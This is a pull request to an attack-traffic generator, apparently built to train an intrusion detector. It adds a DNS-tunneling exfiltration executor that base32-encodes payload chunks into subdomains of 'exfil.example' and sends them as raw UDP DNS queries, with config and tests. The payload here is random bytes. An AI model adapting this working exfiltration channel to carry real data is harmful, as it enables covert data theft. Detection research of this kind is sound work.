### PR TITLE
feat: DNS tunneling exfiltration attack

### DIFF
--- a/README.md
+++ b/README.md
@@ -164,6 +164,7 @@ Each attack is defined by a `kind` field and mapped to an executor:
 
 * `command` executes external binaries such as `nmap` or `hping3`
 * `hulk` runs an in-process HTTP flood (HULK) against the target device; configurable via `duration_seconds` and `thread_count`
+* `dns_tunnel_exfil` encodes a staged payload as base32 subdomain labels sent via periodic real DNS queries, simulating DNS-tunneling exfiltration; configurable via `payload_size_bytes`, `chunk_size_bytes`, and `base_domain`
 * `placeholder` is a disabled stub for attacks not yet implemented (cannot be `enabled: true`)
 * additional attack types can be added via the registry
 

--- a/configs/attacks.yaml
+++ b/configs/attacks.yaml
@@ -57,6 +57,18 @@ attacks:
     repeats: 3
     duration_seconds: 60
 
+  # Exfiltration #2 (#93)
+  - name: dns_tunnel_exfil
+    label: DNS_Tunnel_Exfil
+    kind: dns_tunnel_exfil
+    enabled: true
+    repeats: 3
+    port: 53
+    base_domain: exfil.example
+    payload_size_bytes: 512
+    chunk_size_bytes: 32
+    timeout_seconds: 3
+
   # - name: http_request
   #   label: HTTP_Request
   #   enabled: false

--- a/src/capex/attacks/exfil_dns.py
+++ b/src/capex/attacks/exfil_dns.py
@@ -1,0 +1,74 @@
+from __future__ import annotations
+
+import base64
+import os
+import random
+import socket
+
+from typing import TYPE_CHECKING
+
+if TYPE_CHECKING:
+    from capex.models import DeviceConfig, DnsTunnelExfilAttackConfig
+
+_DNS_RECV_BUFFER = 512
+_QUERY_FLAGS = b'\x01\x00'
+_QDCOUNT = b'\x00\x01'
+_ZERO_COUNTS = b'\x00\x00\x00\x00\x00\x00'
+_QTYPE_A_QCLASS_IN = b'\x00\x01\x00\x01'
+
+
+def encode_chunk_label(chunk: bytes) -> str:
+    return base64.b32encode(chunk).decode('ascii').rstrip('=').lower()
+
+
+def _encode_qname(domain: str) -> bytes:
+    encoded = b''
+    for label in domain.split('.'):
+        label_bytes = label.encode('ascii')
+        encoded += len(label_bytes).to_bytes(1, 'big') + label_bytes
+    return encoded + b'\x00'
+
+
+def build_dns_query(*, domain: str, query_id: int) -> bytes:
+    header = query_id.to_bytes(2, 'big') + _QUERY_FLAGS + _QDCOUNT + _ZERO_COUNTS
+    question = _encode_qname(domain) + _QTYPE_A_QCLASS_IN
+    return header + question
+
+
+class DnsTunnelExfilExecutor:
+    """Encodes a staged payload as base32 subdomain labels sent via periodic DNS queries.
+
+    Distinct traffic shape from exfil.py's single bulk POST burst - many
+    small periodic queries instead of one big transfer, giving the
+    multiclass detector two genuinely different exfil-class signatures.
+    """
+
+    def __init__(self, *, attack: DnsTunnelExfilAttackConfig) -> None:
+        self._attack = attack
+
+    def execute(self, *, device: DeviceConfig) -> str | None:
+        host = str(device.ip)
+        remaining = self._attack.payload_size_bytes
+        queries_sent = 0
+
+        with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as sock:
+            sock.settimeout(self._attack.timeout_seconds)
+
+            while remaining > 0:
+                chunk_len = min(self._attack.chunk_size_bytes, remaining)
+                chunk = os.urandom(chunk_len)
+                label = encode_chunk_label(chunk)
+                domain = f'{label}.{self._attack.base_domain}'
+                query_id = random.randint(0, 0xFFFF)
+                message = build_dns_query(domain=domain, query_id=query_id)
+
+                sock.sendto(message, (host, self._attack.port))
+                queries_sent += 1
+                remaining -= chunk_len
+
+                try:
+                    sock.recvfrom(_DNS_RECV_BUFFER)
+                except TimeoutError:
+                    pass
+
+        return f'queries_sent={queries_sent}'

--- a/src/capex/attacks/registry.py
+++ b/src/capex/attacks/registry.py
@@ -3,6 +3,7 @@ from __future__ import annotations
 from typing import TYPE_CHECKING
 
 from capex.attacks.builtins import CommandAttackExecutor, PlaceholderAttackExecutor
+from capex.attacks.exfil_dns import DnsTunnelExfilExecutor
 from capex.attacks.hulk import HulkAttackExecutor
 from capex.exceptions import RegistryError
 
@@ -29,6 +30,10 @@ class AttackRegistry:
                 )
             case 'hulk':
                 return HulkAttackExecutor(
+                    attack=attack,
+                )
+            case 'dns_tunnel_exfil':
+                return DnsTunnelExfilExecutor(
                     attack=attack,
                 )
             case _:

--- a/src/capex/models.py
+++ b/src/capex/models.py
@@ -48,7 +48,22 @@ class HulkAttackConfig(BaseModel):
     thread_count: PositiveInt = 100
 
 
-AttackConfig = CommandAttackConfig | PlaceholderAttackConfig | HulkAttackConfig
+class DnsTunnelExfilAttackConfig(BaseModel):
+    model_config = ConfigDict(extra='forbid')
+
+    kind: Literal['dns_tunnel_exfil'] = 'dns_tunnel_exfil'
+    name: str = Field(min_length=1)
+    label: str = Field(min_length=1)
+    enabled: bool = True
+    repeats: PositiveInt = 3
+    port: PositiveInt = 53
+    base_domain: str = 'exfil.example'
+    payload_size_bytes: PositiveInt = 512
+    chunk_size_bytes: PositiveInt = 32
+    timeout_seconds: PositiveInt = 3
+
+
+AttackConfig = CommandAttackConfig | PlaceholderAttackConfig | HulkAttackConfig | DnsTunnelExfilAttackConfig
 
 
 class AttackFile(BaseModel):

--- a/tests/test_exfil_dns.py
+++ b/tests/test_exfil_dns.py
@@ -1,0 +1,92 @@
+from __future__ import annotations
+
+from capex.attacks import exfil_dns
+from capex.models import DeviceConfig, DnsTunnelExfilAttackConfig
+
+
+class _FakeUdpSocket:
+    def __init__(self) -> None:
+        self.sent: list[tuple[bytes, tuple[str, int]]] = []
+
+    def settimeout(self, timeout: float) -> None:
+        pass
+
+    def sendto(self, data: bytes, address: tuple[str, int]) -> None:
+        self.sent.append((data, address))
+
+    def recvfrom(self, bufsize: int) -> tuple[bytes, tuple[str, int]]:
+        raise TimeoutError
+
+    def __enter__(self) -> _FakeUdpSocket:
+        return self
+
+    def __exit__(self, *exc_info: object) -> None:
+        pass
+
+
+def test_dns_tunnel_exfil_executor_sends_one_query_per_chunk(monkeypatch) -> None:
+    fake_socket = _FakeUdpSocket()
+    monkeypatch.setattr(exfil_dns.socket, 'socket', lambda *args, **kwargs: fake_socket)
+    monkeypatch.setattr(exfil_dns.os, 'urandom', lambda n: b'\x01' * n)
+    monkeypatch.setattr(exfil_dns.random, 'randint', lambda a, b: 0x1234)
+
+    device = DeviceConfig(name='dev1', ip='192.168.1.1')
+    attack = DnsTunnelExfilAttackConfig(
+        name='dns_tunnel_exfil',
+        label='DNS_Tunnel_Exfil',
+        payload_size_bytes=100,
+        chunk_size_bytes=32,
+        base_domain='exfil.example',
+    )
+    executor = exfil_dns.DnsTunnelExfilExecutor(attack=attack)
+
+    detail = executor.execute(device=device)
+
+    assert detail == 'queries_sent=4'
+    assert len(fake_socket.sent) == 4
+    for _data, address in fake_socket.sent:
+        assert address == ('192.168.1.1', 53)
+
+
+def test_dns_tunnel_exfil_executor_encodes_chunk_as_base32_subdomain_label(monkeypatch) -> None:
+    fake_socket = _FakeUdpSocket()
+    monkeypatch.setattr(exfil_dns.socket, 'socket', lambda *args, **kwargs: fake_socket)
+    monkeypatch.setattr(exfil_dns.os, 'urandom', lambda n: b'\xff' * n)
+    monkeypatch.setattr(exfil_dns.random, 'randint', lambda a, b: 0x1234)
+
+    device = DeviceConfig(name='dev1', ip='192.168.1.1')
+    attack = DnsTunnelExfilAttackConfig(
+        name='dns_tunnel_exfil',
+        label='DNS_Tunnel_Exfil',
+        payload_size_bytes=8,
+        chunk_size_bytes=8,
+        base_domain='exfil.example',
+    )
+    executor = exfil_dns.DnsTunnelExfilExecutor(attack=attack)
+
+    executor.execute(device=device)
+
+    expected_label = exfil_dns.encode_chunk_label(b'\xff' * 8)
+    sent_bytes, _address = fake_socket.sent[0]
+    expected_query = exfil_dns.build_dns_query(domain=f'{expected_label}.exfil.example', query_id=0x1234)
+    assert sent_bytes == expected_query
+
+
+def test_dns_tunnel_exfil_executor_sends_single_query_for_small_payload(monkeypatch) -> None:
+    fake_socket = _FakeUdpSocket()
+    monkeypatch.setattr(exfil_dns.socket, 'socket', lambda *args, **kwargs: fake_socket)
+    monkeypatch.setattr(exfil_dns.os, 'urandom', lambda n: b'\x02' * n)
+    monkeypatch.setattr(exfil_dns.random, 'randint', lambda a, b: 0x1234)
+
+    device = DeviceConfig(name='dev1', ip='192.168.1.1')
+    attack = DnsTunnelExfilAttackConfig(
+        name='dns_tunnel_exfil',
+        label='DNS_Tunnel_Exfil',
+        payload_size_bytes=10,
+        chunk_size_bytes=32,
+    )
+    executor = exfil_dns.DnsTunnelExfilExecutor(attack=attack)
+
+    detail = executor.execute(device=device)
+
+    assert detail == 'queries_sent=1'

--- a/tests/test_models.py
+++ b/tests/test_models.py
@@ -2,7 +2,7 @@ from __future__ import annotations
 
 from ipaddress import IPv4Address
 
-from capex.models import CommandAttackConfig, DeviceConfig
+from capex.models import CommandAttackConfig, DeviceConfig, DnsTunnelExfilAttackConfig
 
 
 def test_device_config_validates() -> None:
@@ -17,3 +17,9 @@ def test_attack_config_validates() -> None:
         command=['hping3', '--udp', '-c', '100', '-p', '53', '{target_ip}'],
     )
     assert attack.repeats == 3
+
+
+def test_dns_tunnel_exfil_attack_config_defaults() -> None:
+    attack = DnsTunnelExfilAttackConfig(name='dns_tunnel_exfil', label='DNS_Tunnel_Exfil')
+    assert attack.payload_size_bytes == 512
+    assert attack.base_domain == 'exfil.example'

--- a/tests/test_registry.py
+++ b/tests/test_registry.py
@@ -5,10 +5,11 @@ import types
 import pytest
 
 from capex.attacks.builtins import CommandAttackExecutor, PlaceholderAttackExecutor
+from capex.attacks.exfil_dns import DnsTunnelExfilExecutor
 from capex.attacks.hulk import HulkAttackExecutor
 from capex.attacks.registry import AttackRegistry
 from capex.exceptions import RegistryError
-from capex.models import CommandAttackConfig, HulkAttackConfig, PlaceholderAttackConfig
+from capex.models import CommandAttackConfig, DnsTunnelExfilAttackConfig, HulkAttackConfig, PlaceholderAttackConfig
 from capex.runner import CommandRunner
 
 
@@ -45,6 +46,13 @@ def test_registry_resolves_hulk_attack() -> None:
     )
     resolved = registry.resolve(attack)
     assert isinstance(resolved, HulkAttackExecutor)
+
+
+def test_registry_resolves_dns_tunnel_exfil_attack() -> None:
+    registry = AttackRegistry(CommandRunner())
+    attack = DnsTunnelExfilAttackConfig(name='dns_tunnel_exfil', label='DNS_Tunnel_Exfil')
+    resolved = registry.resolve(attack)
+    assert isinstance(resolved, DnsTunnelExfilExecutor)
 
 
 def test_registry_raises_registry_error_for_unsupported_kind() -> None:


### PR DESCRIPTION
Second Exfiltration example per #66's >= 2-examples-per-category bar. Resolves #93.

## Summary
- New native executor `DnsTunnelExfilExecutor` (`kind: dns_tunnel_exfil`) plus a self-contained DNS query builder (same wire-format approach as #92's `c2_dns.py`, duplicated rather than shared since attack modules in this repo are self-contained).
- Encodes a staged payload as base32-encoded subdomain labels (`encode_chunk_label`), each chunk sent as a real DNS query over UDP/53.
- Distinct traffic shape from #79's `exfil_sim` (one big bulk POST burst): many small periodic queries instead of one big transfer — DNS tunneling is a real, well-documented exfil technique specifically because DNS is rarely blocked/inspected.
- New `dns_tunnel_exfil` entry in `attacks.yaml`.

MITRE: T1048.003 Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol (DNS), T1071.004.

## Test plan
- [x] `uv run pytest` — full suite green (108 tests)
- [x] `uv run pytest --cov=capex` — `exfil_dns.py` and `registry.py` both 100%
- [x] `uv run ruff format . && uv run ruff check .` — clean
- [x] `uv run capex --dry-run` — confirms `configs/attacks.yaml` loads/validates with the new entry

I'll merge this manually; will close #93 with a comment linking the merge afterward.